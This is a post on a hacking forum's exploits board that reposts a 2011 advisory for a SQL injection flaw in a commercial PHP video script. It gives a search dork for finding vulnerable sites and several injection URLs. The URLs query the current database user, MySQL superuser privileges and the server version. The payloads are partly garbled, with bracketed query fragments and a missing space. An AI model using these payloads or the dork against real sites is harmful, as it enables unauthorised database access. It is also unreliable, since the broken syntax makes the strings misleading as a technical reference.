.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

.:: Blackc0de Forum ::. :: Information Technology :: Exploits
 

 php video script SQL Injection Vulnerability

Go down 
PengirimMessage
Paul Hitler
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 6
Points : 19
Reputation : 1
Join date : 26.11.11

php video script SQL Injection Vulnerability Empty
PostSubyek: php video script SQL Injection Vulnerability   php video script SQL Injection Vulnerability Icon_minitimeSat Nov 26, 2011 4:36 am

######################################################
# Exploit Title: php video script SQL Injection Vulnerability
# Date: 2011-25-11
# Author: longrifle0x
# Home page: www.security-research.ge
# software: PHP video script
# Download:http://www.alurian.com/php-video-script/
# Tools: SQLMAP
# Drok: Copyright � PHP Video Script powered by Prismotube All Rights Reserved
######################################################

*DESCRIPTION
Discovered a vulnerability in video_tags,

vulnerability is SQL injection.

*Exploitation*

link: http://localhost:80/tag <http://localhost/tag>

vulnerability link: http://localhost:80/tag <http://localhost/tag>'

http://localhost:80/tag'/index.php?id=1
<http://localhost/tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()

http://localhost:80/tag'/index.php?id=1[GET][id=-1][SELECT(CASE
<http://localhost/tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN
((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y')
THEN 1 ELSE 0 END)

http://localhost:80/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)
<http://localhost/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>
Kembali Ke Atas Go down
 
php video script SQL Injection Vulnerability
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Webit Cms SQL Injection Vulnerability
» eNdonesia 8.3 SQL Injection Vulnerability
» XLAgenda : SQL injection vulnerability
» WEBANDHOST CMS SQL Injection Vulnerability
» Miibeian - SQL Injection Vulnerability

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: